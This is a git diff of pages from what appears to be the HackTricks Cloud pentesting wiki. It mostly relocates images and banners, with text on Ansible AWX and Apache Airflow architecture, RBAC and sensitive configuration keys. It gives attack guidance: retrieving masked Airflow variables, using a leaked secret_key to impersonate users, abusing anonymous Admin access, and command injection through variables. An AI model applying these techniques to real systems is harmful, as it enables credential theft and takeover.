b/src/images/image (82).png similarity index 100% rename from .gitbook/assets/image (82).png rename to src/images/image (82).png diff --git a/.gitbook/assets/image (83) (1).png b/src/images/image (83) (1).png similarity index 100% rename from .gitbook/assets/image (83) (1).png rename to src/images/image (83) (1).png diff --git a/.gitbook/assets/image (83).png b/src/images/image (83).png similarity index 100% rename from .gitbook/assets/image (83).png rename to src/images/image (83).png diff --git a/.gitbook/assets/image (84).png b/src/images/image (84).png similarity index 100% rename from .gitbook/assets/image (84).png rename to src/images/image (84).png diff --git a/.gitbook/assets/image (85) (1).png b/src/images/image (85) (1).png similarity index 100% rename from .gitbook/assets/image (85) (1).png rename to src/images/image (85) (1).png diff --git a/.gitbook/assets/image (85).png b/src/images/image (85).png similarity index 100% rename from .gitbook/assets/image (85).png rename to src/images/image (85).png diff --git a/.gitbook/assets/image (86).png b/src/images/image (86).png similarity index 100% rename from .gitbook/assets/image (86).png rename to src/images/image (86).png diff --git a/.gitbook/assets/image (87) (1).png b/src/images/image (87) (1).png similarity index 100% rename from .gitbook/assets/image (87) (1).png rename to src/images/image (87) (1).png diff --git a/.gitbook/assets/image (87).png b/src/images/image (87).png similarity index 100% rename from .gitbook/assets/image (87).png rename to src/images/image (87).png diff --git a/.gitbook/assets/image (88).png b/src/images/image (88).png similarity index 100% rename from .gitbook/assets/image (88).png rename to src/images/image (88).png diff --git a/.gitbook/assets/image (89) (1).png b/src/images/image (89) (1).png similarity index 100% rename from .gitbook/assets/image (89) (1).png rename to src/images/image (89) (1).png diff --git a/.gitbook/assets/image (89).png b/src/images/image (89).png similarity index 100% rename from .gitbook/assets/image (89).png rename to src/images/image (89).png diff --git a/.gitbook/assets/image (9) (1) (1) (1) (1).png b/src/images/image (9) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (9) (1) (1) (1) (1).png rename to src/images/image (9) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (9) (1) (1) (1).png b/src/images/image (9) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (9) (1) (1) (1).png rename to src/images/image (9) (1) (1) (1).png diff --git a/.gitbook/assets/image (9) (1) (1).png b/src/images/image (9) (1) (1).png similarity index 100% rename from .gitbook/assets/image (9) (1) (1).png rename to src/images/image (9) (1) (1).png diff --git a/.gitbook/assets/image (9) (1).png b/src/images/image (9) (1).png similarity index 100% rename from .gitbook/assets/image (9) (1).png rename to src/images/image (9) (1).png diff --git a/.gitbook/assets/image (9) (2).png b/src/images/image (9) (2).png similarity index 100% rename from .gitbook/assets/image (9) (2).png rename to src/images/image (9) (2).png diff --git a/.gitbook/assets/image (9).png b/src/images/image (9).png similarity index 100% rename from .gitbook/assets/image (9).png rename to src/images/image (9).png diff --git a/.gitbook/assets/image (90).png b/src/images/image (90).png similarity index 100% rename from .gitbook/assets/image (90).png rename to src/images/image (90).png diff --git a/.gitbook/assets/image (91).png b/src/images/image (91).png similarity index 100% rename from .gitbook/assets/image (91).png rename to src/images/image (91).png diff --git a/.gitbook/assets/image (92) (1) (1).png b/src/images/image (92) (1) (1).png similarity index 100% rename from .gitbook/assets/image (92) (1) (1).png rename to src/images/image (92) (1) (1).png diff --git a/.gitbook/assets/image (92) (1).png b/src/images/image (92) (1).png similarity index 100% rename from .gitbook/assets/image (92) (1).png rename to src/images/image (92) (1).png diff --git a/.gitbook/assets/image (92).png b/src/images/image (92).png similarity index 100% rename from .gitbook/assets/image (92).png rename to src/images/image (92).png diff --git a/.gitbook/assets/image (93).png b/src/images/image (93).png similarity index 100% rename from .gitbook/assets/image (93).png rename to src/images/image (93).png diff --git a/.gitbook/assets/image (94).png b/src/images/image (94).png similarity index 100% rename from .gitbook/assets/image (94).png rename to src/images/image (94).png diff --git a/.gitbook/assets/image (95).png b/src/images/image (95).png similarity index 100% rename from .gitbook/assets/image (95).png rename to src/images/image (95).png diff --git a/.gitbook/assets/image (96).png b/src/images/image (96).png similarity index 100% rename from .gitbook/assets/image (96).png rename to src/images/image (96).png diff --git a/.gitbook/assets/image (97).png b/src/images/image (97).png similarity index 100% rename from .gitbook/assets/image (97).png rename to src/images/image (97).png diff --git a/.gitbook/assets/image (98).png b/src/images/image (98).png similarity index 100% rename from .gitbook/assets/image (98).png rename to src/images/image (98).png diff --git a/.gitbook/assets/image (99).png b/src/images/image (99).png similarity index 100% rename from .gitbook/assets/image (99).png rename to src/images/image (99).png diff --git a/.gitbook/assets/image.png b/src/images/image.png similarity index 100% rename from .gitbook/assets/image.png rename to src/images/image.png diff --git a/.gitbook/assets/openshift-missing-service-account-image1.png b/src/images/openshift-missing-service-account-image1.png similarity index 100% rename from .gitbook/assets/openshift-missing-service-account-image1.png rename to src/images/openshift-missing-service-account-image1.png diff --git a/.gitbook/assets/openshift-missing-service-account-image2.png b/src/images/openshift-missing-service-account-image2.png similarity index 100% rename from .gitbook/assets/openshift-missing-service-account-image2.png rename to src/images/openshift-missing-service-account-image2.png diff --git a/src/images/sponsor_8ksec.png b/src/images/sponsor_8ksec.png new file mode 100644 index 000000000..1d751216b Binary files /dev/null and b/src/images/sponsor_8ksec.png differ diff --git a/src/images/sponsor_hackenproof.jpeg b/src/images/sponsor_hackenproof.jpeg new file mode 100644 index 000000000..a4c6bc6f4 Binary files /dev/null and b/src/images/sponsor_hackenproof.jpeg differ diff --git a/src/images/sponsor_intigriti.png b/src/images/sponsor_intigriti.png new file mode 100644 index 000000000..b7944f7d8 Binary files /dev/null and b/src/images/sponsor_intigriti.png differ diff --git a/src/images/sponsor_pentesttools.webp b/src/images/sponsor_pentesttools.webp new file mode 100644 index 000000000..1b5a0d663 Binary files /dev/null and b/src/images/sponsor_pentesttools.webp differ diff --git a/src/images/sponsor_rootedcon.png b/src/images/sponsor_rootedcon.png new file mode 100644 index 000000000..cf4e8a20a Binary files /dev/null and b/src/images/sponsor_rootedcon.png differ diff --git a/src/images/sponsor_stm.png b/src/images/sponsor_stm.png new file mode 100644 index 000000000..e45c021c8 Binary files /dev/null and b/src/images/sponsor_stm.png differ diff --git a/src/images/sponsor_trickest.jpeg b/src/images/sponsor_trickest.jpeg new file mode 100644 index 000000000..92331426b Binary files /dev/null and b/src/images/sponsor_trickest.jpeg differ diff --git a/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg b/src/images/telegram-cloud-document-4-5875069018120918586.jpg similarity index 100% rename from .gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg rename to src/images/telegram-cloud-document-4-5875069018120918586.jpg diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg b/src/images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg similarity index 100% rename from .gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg rename to src/images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg b/src/images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg similarity index 100% rename from .gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg rename to src/images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg b/src/images/telegram-cloud-photo-size-4-5920521132757336440-y.jpg similarity index 100% rename from .gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg rename to src/images/telegram-cloud-photo-size-4-5920521132757336440-y.jpg diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg b/src/images/telegram-cloud-photo-size-4-6044191430395675441-x.jpg similarity index 100% rename from .gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg rename to src/images/telegram-cloud-photo-size-4-6044191430395675441-x.jpg diff --git a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md similarity index 51% rename from pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md rename to src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index 8098117c1..db07fc286 100644 --- a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -1,19 +1,6 @@ # Ansible Tower / AWX / Automation controller Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information @@ -27,51 +14,50 @@ According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-h ### Tech Stack -* **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. -* **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -* **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -* **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -* **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. +- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. +- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. +- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. +- **Redis**: Redis serves as a cache and a backend for the task queue. ### Logical Components -* **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -* **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. -* **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -* **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -* **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -* **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -* **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -* **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. +- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. +- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. +- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. +- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. +- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. +- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. +- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. ### Job Execution Flow 1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. 2. **Job Initiation**: - * The user, via the Web Interface or API, initiates a job based on a **Job Template**. - * The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - * Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. + - The user, via the Web Interface or API, initiates a job based on a **Job Template**. + - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. + - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. 3. **Job Queuing**: - * **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - * **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. + - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. + - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. 4. **Job Execution**: - * The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - * Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - * As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. + - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. + - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. + - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. 5. **Job Results**: - * Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. - * Users can then view the results through the Web Interface or query them via the REST API. - * Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. + - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. + - Users can then view the results through the Web Interface or query them via the REST API. + - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. 6. **External Systems Integration**: - * **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - * **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - * **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. + - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. + - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. + - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. ### AWX lab creation for testing [**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: -{% code overflow="wrap" %} ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -97,7 +83,6 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` -{% endcode %} ## RBAC @@ -112,56 +97,43 @@ From a **white box security** review, you would need the **System Auditor role** Expand this to get detailed description of available roles 1. **System Administrator**: - * This is the superuser role with permissions to access and modify any resource in the system. - * They can manage all organizations, teams, projects, inventories, job templates, etc. + - This is the superuser role with permissions to access and modify any resource in the system. + - They can manage all organizations, teams, projects, inventories, job templates, etc. 2. **System Auditor**: - * Users with this role can view all system data but cannot make any changes. - * This role is designed for compliance and oversight. + - Users with this role can view all system data but cannot make any changes. + - This role is designed for compliance and oversight. 3. **Organization Roles**: - * **Admin**: Full control over the organization's resources. - * **Auditor**: View-only access to the organization's resources. - * **Member**: Basic membership in an organization without any specific permissions. - * **Execute**: Can run job templates within the organization. - * **Read**: Can view the organization’s resources. + - **Admin**: Full control over the organization's resources. + - **Auditor**: View-only access to the organization's resources. + - **Member**: Basic membership in an organization without any specific permissions. + - **Execute**: Can run job templates within the organization. + - **Read**: Can view the organization’s resources. 4. **Project Roles**: - * **Admin**: Can manage and modify the project. - * **Use**: Can use the project in a job template. - * **Update**: Can update project using SCM (source control). + - **Admin**: Can manage and modify the project. + - **Use**: Can use the project in a job template. + - **Update**: Can update project using SCM (source control). 5. **Inventory Roles**: - * **Admin**: Can manage and modify the inventory. - * **Ad Hoc**: Can run ad hoc commands on the inventory. - * **Update**: Can update the inventory source. - * **Use**: Can use the inventory in a job template. - * **Read**: View-only access. + - **Admin**: Can manage and modify the inventory. + - **Ad Hoc**: Can run ad hoc commands on the inventory. + - **Update**: Can update the inventory source. + - **Use**: Can use the inventory in a job template. + - **Read**: View-only access. 6. **Job Template Roles**: - * **Admin**: Can manage and modify the job template. - * **Execute**: Can run the job. - * **Read**: View-only access. + - **Admin**: Can manage and modify the job template. + - **Execute**: Can run the job. + - **Read**: View-only access. 7. **Credential Roles**: - * **Admin**: Can manage and modify the credentials. - * **Use**: Can use the credentials in job templates or other relevant resources. - * **Read**: View-only access. + - **Admin**: Can manage and modify the credentials. + - **Use**: Can use the credentials in job templates or other relevant resources. + - **Read**: View-only access. 8. **Team Roles**: - * **Member**: Part of the team but without any specific permissions. - * **Admin**: Can manage the team's members and associated resources. + - **Member**: Part of the team but without any specific permissions. + - **Admin**: Can manage the team's members and associated resources. 9. **Workflow Roles**: - * **Admin**: Can manage and modify the workflow. - * **Execute**: Can run the workflow. - * **Read**: View-only access. + - **Admin**: Can manage and modify the workflow. + - **Execute**: Can run the workflow. + - **Read**: View-only access. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md similarity index 69% rename from pentesting-ci-cd/apache-airflow-security/README.md rename to src/pentesting-ci-cd/apache-airflow-security/README.md index fac6233fb..5da57b39d 100644 --- a/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md @@ -1,19 +1,6 @@ # Apache Airflow Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ### Basic Information @@ -45,17 +32,17 @@ helm delete airflow-release Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: -{% content-ref url="airflow-configuration.md" %} -[airflow-configuration.md](airflow-configuration.md) -{% endcontent-ref %} +{{#ref}} +airflow-configuration.md +{{#endref}} ### Airflow RBAC Before start attacking Airflow you should understand **how permissions work**: -{% content-ref url="airflow-rbac.md" %} -[airflow-rbac.md](airflow-rbac.md) -{% endcontent-ref %} +{{#ref}} +airflow-rbac.md +{{#endref}} ### Attacks @@ -63,25 +50,25 @@ Before start attacking Airflow you should understand **how permissions work**: If you have **access to the web console** you might be able to access some or all of the following information: -* **Variables** (Custom sensitive information might be stored here) -* **Connections** (Custom sensitive information might be stored here) - * Access them in `http:///connection/list/` -* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -* List **users & roles** -* **Code of each DAG** (which might contain interesting info) +- **Variables** (Custom sensitive information might be stored here) +- **Connections** (Custom sensitive information might be stored here) + - Access them in `http:///connection/list/` +- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) +- List **users & roles** +- **Code of each DAG** (which might contain interesting info) #### Retrieve Variables Values Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. -![](<../../.gitbook/assets/image (164).png>) +![](<../../images/image (164).png>) However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: -![](<../../.gitbook/assets/image (152).png>) +![](<../../images/image (152).png>) #### Privilege Escalation @@ -185,17 +172,4 @@ foo = Variable.get("foo") If they are used for example inside a a bash command, you could perform a command injection. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md new file mode 100644 index 000000000..666d49577 --- /dev/null +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md @@ -0,0 +1,111 @@ +# Airflow Configuration + +{{#include ../../banners/hacktricks-training.md}} + +## Configuration File + +**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** + +**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** + +Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. + +If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ +If you have **access to some machine inside the airflow env**, check the **environment**. + +Some interesting values to check when reading the config file: + +### \[api] + +- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** +- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** +- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** +- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: + - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API + - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication + - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** + - `airflow.api.auth.backend.basic_auth`: For **basic authentication** + - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). + - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). + - You can also **create you own authentication** method with python. +- **`google_key_path`:** Path to the **GCP service account key** + +### **\[atlas]** + +- **`password`**: Atlas password +- **`username`**: Atlas username + +### \[celery] + +- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) +- **`result_backend`**: Postgres url which may contain **credentials**. +- **`ssl_cacert`**: Path to the cacert +- **`ssl_cert`**: Path to the cert +- **`ssl_key`**: Path to the key + +### \[core] + +- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. +- **`fernet_key`**: Key to store encrypted variables (symmetric) +- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. +- **`security`**: What security module to use (for example kerberos) + +### \[dask] + +- **`tls_ca`**: Path to ca +- **`tls_cert`**: Part to the cert +- **`tls_key`**: Part to the tls key + +### \[kerberos] + +- **`ccache`**: Path to ccache file +- **`forwardable`**: Enabled by default + +### \[logging] + +- **`google_key_path`**: Path to GCP JSON creds. + +### \[secrets] + +- **`backend`**: Full class name of secrets backend to enable +- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. + +### \[smtp] + +- **`smtp_password`**: SMTP password +- **`smtp_user`**: SMTP user + +### \[webserver] + +- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value +- **`cookie_secure`**: Set **secure flag** on the the session cookie +- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** +- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) +- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) +- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** +- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** +- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible + +### Web Authentication + +By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as + +```bash +AUTH_TYPE = AUTH_DB +``` + +Which means that the **authentication is checked against the database**. However, other configurations are possible like + +```bash +AUTH_TYPE = AUTH_OAUTH +``` + +To leave the **authentication to third party services**. + +However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: + +```bash +AUTH_ROLE_PUBLIC = 'Admin' +``` + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md similarity index 68% rename from pentesting-ci-cd/apache-airflow-security/airflow-rbac.md rename to src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 94580b7b0..09d5d84fa 100644 --- a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -1,29 +1,16 @@ # Airflow RBAC -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## RBAC (From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. -* **`Admin`** users have all possible permissions. -* **`Public`** users (anonymous) don’t have any permissions. -* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -* **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** users have all possible permissions. +- **`Public`** users (anonymous) don’t have any permissions. +- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** +- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** +- **`Op`** users have `User` permissions plus additional op permissions. Note that **admin** users can **create more roles** with more **granular permissions**. @@ -33,37 +20,24 @@ Also note that the only default role with **permission to list users and roles i These are the default permissions per default role: -* **Admin** +- **Admin** \[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit 